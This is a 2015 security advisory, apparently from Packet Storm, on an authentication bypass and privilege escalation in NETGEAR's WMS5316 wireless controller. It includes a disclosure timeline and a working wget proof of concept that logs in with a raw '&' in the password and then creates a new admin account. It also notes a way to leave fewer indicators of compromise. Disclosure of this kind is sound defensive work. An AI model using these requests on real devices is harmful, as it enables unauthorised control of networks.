exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NETGEAR WMS Authentication Bypass / Privilege Escalation

NETGEAR WMS Authentication Bypass / Privilege Escalation
Posted Sep 7, 2015
Authored by Elliott Lewis

NETGEAR WMS5316 ProSafe 16AP Wireless Management System suffers from authentication bypass and privilege escalation vulnerabilities.

tags | exploit, vulnerability, bypass
SHA-256 | 86cc59ece6d7740256a5f0acbd7fe46d2604e8275a7d58e19671e76ed8abe30c

NETGEAR WMS Authentication Bypass / Privilege Escalation

Change Mirror Download
NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation.
WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15
(Build 1236).


[-] Vulnerability Information:
==============================
Title: NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation
CVE: Not assigned
Vendor: NETGEAR
Product: WMS5316 ProSafe 16AP Wireless Management System
Affected Version: Firmware 2.1.4.15 (Build 1236)
Fixed Version: Not publicly available


[-] Disclosure Timeline:
========================
22/04/2015
Vulnerability identified by Reinforce Services

23/04/2015
Support case created with NETGEAR.

24/04/2015
Vendor requested further information.

27/04/2015
Issue escalated within NETGEAR.

30/04/2015
Issue confirmed by vendor.

18/05/2015
Vendor confirmed issue present in other controllers (details unknown)
Beta update for WMS5316 expected first week of June.

06/25/2015
Vendor releases firmware version 2.1.5 that now contains a fix.
http://downloadcenter.netgear.com/en/product/WMS5316#
http://kb.netgear.com/app/answers/detail/a_id/29339
(Note: This has not been tested to confirm the issue is resolved)


[-] Proof of Concept:
=================
wget --keep-session-cookies --save-cookies=cookies.txt
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
http://192.168.1.2/login_handler.php && wget
--load-cookies=cookies.txt
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
http://192.168.1.2/request_handler.php


[-] Vulnerability Details:
==========================
The process to bypass authentication and escalate privileges is as follows:

One:
Include the "&" symbol anywhere in the password value in the login
request (as raw content - it must not be encoded).

Two:
After a moment, the system will accept those credentials and grant
access to the GUI. The account appears somewhat restricted - but this
is only client side.

Three:
Send a request to add a new administrative user.

Four:
The new admin account is then available for use as created above.

Note: As an alternative, it is trivial to modify the Java code on it's
way down to a browser to enable all of the admin functions rather than
creating a new user.
This worked as well - so it's not strictly necessary to create a new
user; the bypass 'user' has full admin access if needed (leaving less
indicators of compromise)


[-] Credits:
============
Vulnerability discovered by Elliott Lewis of Reinforce Services


[-] Copyright:
==============
Copyright (c) Reinforce Services Limited 2015, All rights reserved
worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered
in any way without the express written consent of Reinforce Services
Limited.


[-] Disclaimer:
===============
The information herein contained may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this
information or its use. Any use of this information is at the user's
risk. In no event shall the author/distributor (Reinforce Services
Limited) be held liable for any damages whatsoever arising out of or
in connection with the use or spread of this information.
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close